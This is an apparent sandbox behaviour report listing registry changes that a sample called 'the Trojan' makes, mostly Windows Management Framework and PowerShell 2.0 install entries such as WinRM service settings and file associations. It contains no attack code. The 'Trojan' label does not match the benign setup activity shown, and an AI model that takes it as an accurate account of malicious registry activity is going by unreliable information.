[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 58 51 7E 82 2C B0 F9 05 94 A6 B5 81 82 B7 71"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"
[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"UpgradeType" = "0"
[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"
[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.psc1]
"Content Type" = "application/PowerShell"
[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"
[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"
[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20150716"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"
[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"
[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"
[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"
[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 AC D5 A5 AD AE 24 E1 2A 75 8F 1C C3 45 AA C1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process PSCustomSetupUtil.exe:3592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 DB 48 99 A3 4A 7C 1F 9B A8 BF 7D F5 BA 32 F9"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 EB A4 21 A2 40 B0 73 92 D7 AD A9 47 F8 98 3D"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "7E 71 C8 CA 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"
The process PSCustomSetupUtil.exe:2900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 23 1E 4A 3F 39 FF 24 5A 79 B7 7A 98 20 AD 20"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "40 8A 05 CC 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"
The process PSCustomSetupUtil.exe:3776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 BA 7A F2 7F 5C E6 11 BF B3 77 39 A3 42 8D B9"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "12 5B 04 D0 6D BF D0 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"
The process PSCustomSetupUtil.exe:3612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 E2 EA E4 A4 6A E7 07 68 F9 90 3E AF A7 20 C9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:3736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 92 2F 6A BF 69 3B C6 B3 B7 56 7E E9 C9 BE 2C"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "80 5C E5 CF 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"
The process PSCustomSetupUtil.exe:3164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 4B 18 F8 C2 2E 52 91 4D 9C F7 CD 70 C0 1C BF"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "DE A5 04 CD 6D BF D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
